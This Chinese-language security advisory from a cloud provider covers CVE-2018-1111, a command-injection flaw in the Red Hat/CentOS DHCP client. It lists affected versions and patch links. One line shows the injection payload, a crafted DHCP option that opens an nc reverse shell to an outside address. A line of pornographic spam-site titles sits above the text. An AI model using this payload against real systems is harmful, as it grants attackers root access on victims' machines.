91百色国产视频|亚洲欧美伦理中文字幕在线|亚洲中文乱码在线|天堂影音av在线|国产激情人妻熟女|AV无码高清在线|超碰在线免费观看操|亚洲va中文字幕|欧美极品性爱四区|国产精品二区在线观看

2018年5月16日，金山云安全應急響應中心監(jiān)控到紅帽官方發(fā)布了安全更新，修復了編號為CVE-2018-1111的遠程代碼執(zhí)行漏洞，攻擊者可以通過偽造DHCP服務器發(fā)送響應包，攻擊紅帽系統(tǒng)，獲取root權限并執(zhí)行任意命令。目前相關利用代碼已經(jīng)公開，可用于本地網(wǎng)絡攻擊。

漏洞名稱

Red Hat DHCP客戶端命令執(zhí)行漏洞預警

漏洞危害等級

嚴重

影響版本

Red Hat Enterprise Linux Server 6

Red Hat Enterprise Linux Server 7

CentOS 6

CentOS 7

漏洞描述

CVE-2018-1111的遠程代碼執(zhí)行漏洞，攻擊者可以通過偽造DHCP服務器發(fā)送響應包，攻擊紅帽系統(tǒng)，獲取root權限并執(zhí)行任意命令。DHCP 是一個局域網(wǎng)的網(wǎng)絡協(xié)議，主要用于內(nèi)部網(wǎng)絡動態(tài)IP地址分配。

RedHat提供的DHCP客戶端軟件包dhclient的腳本為：

/etc/NetworkManager/dispatcher.d/11-dhclient（RedHat Enterprise Linux 7）

/etc/NetworkManager/dispatcher.d/10-dhclient（RedHat Enterprise Linux 6）

當NetworkManager組件從DHCP服務器收到DHCP響應時執(zhí)行該腳本。

使用單引號使參數(shù)值逃逸成功，導致了命令執(zhí)行  

--dhcp-option="252,x'&nc -e /bin/bas 10.1.1.1 1337 #

漏洞編號

CVE-2018-1111

修復方案

受影響產(chǎn)品的更新

具體產(chǎn)品

更新軟件包

更新鏈接

Red Hat Enterprise Linux 7(z-stream)

dhclient

RHSA-2018:1453

Red Hat Enterprise Linux 7.4 Extended Update Support *

dhclient

RHSA-2018:1455

Red Hat Enterprise Linux 7.3 Extended Update Support *

dhclient

RHSA-2018:1456

Red Hat Enterprise Linux 7.2 Advanced Update Support, Telco Extended Update Support, and Update Services for SAP Solutions ,*,**

dhclient

RHSA-2018:1457

Red Hat Enterprise Linux 6 (z-stream)

dhclient

RHSA-2018:1454

Red Hat Enterprise Linux 6.7 Extended Update Support *

dhclient

RHSA-2018:1458

Red Hat Enterprise Linux 6.6 Advanced Update Support and Telco Extended Update Support ,*

dhclient

RHSA-2018:1459

Red Hat Enterprise Linux 6.5 Advanced Update Support **

dhclient

RHSA-2018:1460

Red Hat Enterprise Linux 6.4 Advanced Update Support **

dhclient

RHSA-2018:1461

相關鏈接

https://access.redhat.com/errata/RHSA-2018:1458

https://dynoroot.ninja/

https://cert.#/warning/detail?id=f075706d5a3c7efbb56efeead3d68a72

北京金山云網(wǎng)絡技術有限公司

2018/05/16